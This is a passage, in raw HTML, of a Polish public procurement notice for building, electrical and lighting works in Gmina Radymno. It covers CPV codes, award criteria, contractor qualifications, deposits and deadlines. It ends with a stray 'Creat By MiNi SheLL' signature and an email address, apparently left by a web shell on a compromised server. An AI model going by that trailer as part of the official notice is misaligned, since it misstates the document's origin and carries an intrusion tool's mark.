zapewnią jej następujące właściwości funkcjonalnoużytkowe:<br/>a) za podstawę wykonania robót należy przyjąć założenia i wymagania przedstawione w Programie Funkcjonalno-<br/>Użytkowym, które pod względem technicznym pozwolą uzyskać spodziewany efekt inwestycji,<br/>b) zastosowane materiały oraz jakość wykonanych robót powinny zapewniać wysoką trwałość i niezawodność budynku i<br/>zamontowanych urządzeń,<br/>c) zastosowane materiały powinny uwzględniać możliwość bezawaryjnej pracy w zmiennych warunkach eksploatacyjnych,<br/>możliwych do przewidzenia na etapie projektowania i robót budowlanych,<br/>d) wszystkie wykorzystane materiały oraz rozwiązania techniczne muszą uzyskać akceptację Zamawiającego,<br/>e) wszystkie niewymienione w PFU materiały i technologie prowadzenia robót powinny uzyskać akceptację Inspektora Nadzoru,<br/>f) dobór materiałów i urządzeń służących do budowy wodociągu powinien zostać poparty przez Wykonawcę na etapie<br/>projektu stosownymi obliczeniami,<br/>g) wszystkie zaproponowane materiały powinny być dopuszczone do obrotu i stosowania zgodnie z obowiązującym prawem (w szczególności Prawem budowlanym i Ustawą o wyrobach budowlanych) i posiadać wymagane prawem deklaracje lub certyfikaty zgodności i oznakowanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45261200-6 - Wykonywanie pokryć dachowych i malowanie dachów</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">400 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji/rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Cześć III zamówienia obejmuje:<br/>1) Wymianę istniejącego oświetlenia na energooszczędne w szkołach, salach gimnastycznych, świetlicach wiejskich<br/>zlokalizowanych na terenie Gminy Radymno oraz przebudowę instalacji elektrycznej z wymianą istniejącego oświetlenia na<br/>energooszczędne w budynku biblioteki<br/>w miejscowości Michałówka:<br/>Przedmiotem zamówienia jest przebudowa instalacji elektrycznych wraz z wymianą oświetlenia na energooszczędne w<br/>szkołach, salach gimnastycznych oraz świetlicach wiejskich – budynkach będących własnością Gminy Radymno:<br/> Szkoła Podstawowa w Nienowicach,<br/> Szkoła Podstawowa w Łazach,<br/> Szkoła Podstawowa w Duńkowicach,<br/> Szkoła Podstawowa w Ostrowie,<br/> Szkoła Podstawowa w Sośnicy,<br/> Szkoła Podstawowa w Sośnicy – Sala Gimnastyczna,<br/> Szkoła Podstawowa w Świętem,<br/> Szkoła Podstawowa w Skołoszowie,<br/> Szkoła Podstawowa w Korczowej,<br/> Świetlica wiejska w Ostrowie,<br/> Świetlica wiejska w Zamojscach,<br/> Świetlica wiejska w Zabłotcach,<br/> Świetlica wiejska w Nienowicach,<br/> Świetlica wiejska w Chotyńcu,<br/> Świetlica wiejska w Piaskach,<br/> Świetlica Wiejska w Łazach,<br/> Świetlica Wiejska w Świętem,<br/> Biblioteka w Michałówce. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">400 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji/rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) Nie podlegają wykluczeniu z postępowania na zasadach określonych w Rozdziale V;<br/>2) Spełniają warunki udziału w postępowaniu określone poniżej.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że:<br/>a) posiada zdolność kredytową lub środki finansowe w wysokości nie mniejszej niż:<br/>w zakresie części I zamówienia<br/>1. 2 000 000,00 zł (słownie złotych: dwa miliony złotych 00/100), przy czym środki finansowe i zdolność kredytowa mogą się<br/>sumować do wysokości wymaganej przez Zamawiającego;<br/>w zakresie części II zamówienia<br/>2. 2 000 000,00 zł (słownie złotych: dwa miliony złotych 00/100), przy czym środki finansowe i zdolność kredytowa mogą się<br/>sumować do wysokości wymaganej przez Zamawiającego;<br/>w zakresie części III zamówienia<br/>3. 700 000,00 zł (słownie złotych: siedemset tysięcy złotych 00/100), przy czym środki finansowe i zdolność kredytowa mogą<br/>się sumować do wysokości wymaganej przez Zamawiającego.<br/>b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia, z łączną sumą gwarancyjną tego ubezpieczenia nie mniejszą niż:<br/>w zakresie części I zamówienia<br/>1. 2 000 000,00 zł (słownie złotych: dwa miliony złotych 00/100), na jedno i wszystkie zdarzenia w okresie ubezpieczenia;<br/>w zakresie części II zamówienia<br/>2. 2 000 000,00 zł (słownie złotych: dwa miliony złotych 00/100), na jedno i wszystkie zdarzenia w okresie ubezpieczenia;<br/>w zakresie części III zamówienia<br/>3. 1 000 000,00 zł (słownie złotych: jeden milion złotych 00/100), na jedno i wszystkie zdarzenia w okresie ubezpieczenia.<br/>4) zdolności technicznej lub zawodowej:<br/>a) w zakresie dotyczącym posiadania doświadczenia.<br/>Wykonawca spełni warunek jeżeli wykaże że, nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia w którym<br/>upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co<br/>najmniej:<br/>w zakresie części I zamówienia:<br/> dwie roboty budowlane polegające na budowie, przebudowie, rozbudowie, modernizacji lub remoncie budynku<br/>użyteczności publicznej o wartości nie mniejszej niż 2 000 000,00 PLN brutto każda, w skład, których wchodziły, roboty<br/>ogólnobudowlane oraz roboty z zakresu branż sanitarnej i elektrycznej.<br/>Przez 1 robotę budowlaną Zamawiający rozumie wykonanie roboty w ramach jednej umowy.<br/>Przez roboty budowlane wykonane należy rozumieć:<br/>1) roboty budowlane rozpoczęte i zakończone w w/w okresie<br/>2) roboty budowlane zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w w/w okresie.<br/>w zakresie części II zamówienia:<br/> dwie roboty budowlane polegające na budowie, przebudowie, rozbudowie, modernizacji lub remoncie budynku<br/>użyteczności publicznej o wartości nie mniejszej niż 2 000 000,00 PLN brutto każda, w skład, których wchodziły roboty<br/>ogólnobudowlane oraz roboty z zakresu branż sanitarnej i elektrycznej.<br/>Przez 1 robotę budowlaną Zamawiający rozumie wykonanie roboty w ramach jednej umowy.<br/>Przez roboty budowlane wykonane należy rozumieć:<br/>1) roboty budowlane rozpoczęte i zakończone w w/w okresie<br/>2) roboty budowlane zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w w/w okresie.<br/>w zakresie części III zamówienia:<br/> dwie roboty budowlane polegające na budowie, przebudowie, rozbudowie, modernizacji lub remoncie budynku o wartości<br/>nie mniejszej niż 600 000,00 PLN brutto każda, w skład, których wchodziły roboty z zakresu branży elektrycznej w tym<br/>montaż punktów oświetleniowych.<br/>Przez 1 robotę budowlaną Zamawiający rozumie wykonanie roboty w ramach jednej umowy.<br/>Przez roboty budowlane wykonane należy rozumieć:<br/>3) roboty budowlane rozpoczęte i zakończone w w/w okresie<br/>4) roboty budowlane zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w w/w okresie.<br/>b) w zakresie dotyczącym dysponowania osobami zdolnymi do wykonania zamówienia na odpowiednim poziomie, jakości.<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował na etapie realizacji zamówienia:<br/>w zakresie części I zamówienia:<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi, (kierownik budowy, osoba pełniąca jednocześnie<br/>funkcję koordynatora kierowników robót), który posiada uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanej bez ograniczeń lub uprawnienia równoważne oraz przynależy do właściwej izby<br/>samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności cywilnej.<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi branży sanitarnej, kierownikiem robót branży sanitarnej,<br/>który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, bez ograniczeń lub<br/>uprawnienia równoważne oraz przynależy do właściwej izby samorządu zawodowego i posiada wymagane ubezpieczenie<br/>od odpowiedzialności cywilnej.<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi branży elektrycznej, kierownikiem robót branży<br/>elektrycznej, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń lub uprawnienia równoważne oraz przynależy do właściwej izby samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności<br/>cywilnej;<br/>w zakresie części II zamówienia:<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi, (kierownik budowy pełniący jednocześnie funkcję<br/>koordynatora kierowników robót), który posiada uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanej bez ograniczeń lub uprawnienia równoważne oraz przynależy do właściwej izby<br/>samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności cywilnej.<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi branży sanitarnej, kierownikiem robót branży sanitarnej,<br/>który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, bez ograniczeń lub<br/>uprawnienia równoważne oraz przynależy do właściwej izby samorządu zawodowego i posiada wymagane ubezpieczenie<br/>od odpowiedzialności cywilnej.<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi branży elektrycznej, kierownikiem robót branży<br/>elektrycznej, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w<br/>zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń lub uprawnienia równoważne<br/>oraz przynależy do właściwej izby samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności<br/>cywilnej;<br/>w zakresie części III zamówienia:<br/> jedną osobą odpowiedzialną za kierowanie robotami budowlanymi, kierownik budowy branży elektrycznej, który posiada<br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń lub uprawnienia równoważne oraz przynależy do właściwej<br/>izby samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności cywilnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Rozdział XIV SWZ<br/>1. Zamawiający wymaga wniesienia wadium w wysokości:<br/>1) dla części I zamówienia 60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych 00/100);<br/>2) dla części II zamówienia 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100);<br/>3) dla części III zamówienia 15 000,00 zł (słownie: piętnaście tysięcy złotych 00/100).<br/>2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1. w pieniądzu;<br/>2. gwarancjach bankowych;<br/>3. gwarancjach ubezpieczeniowych;<br/>4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2024 r. poz. 419). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie wskazanym<br/>w projektowanych postanowieniach Umowy, stanowiącym Załączniki nr 9-I, 9-II, 9-III do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-31 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamowienia, za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-31 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wynagrodzenie będzie płatne zgodnie z zasadami programu dofinansowującego realizację inwestycji (WSTĘPNA<br/>PROMESA DOFINANSOWANIA INWESTYCJI Z RZĄDOWEGO FUNDUSZUPOLSKI ŁAD: PROGRAMU INWESTYCJI<br/>STRATEGICZNYCH NREdycja8/2023/8085/PolskiLad.

Creat By MiNi SheLL
Email: jattceo@gmail.com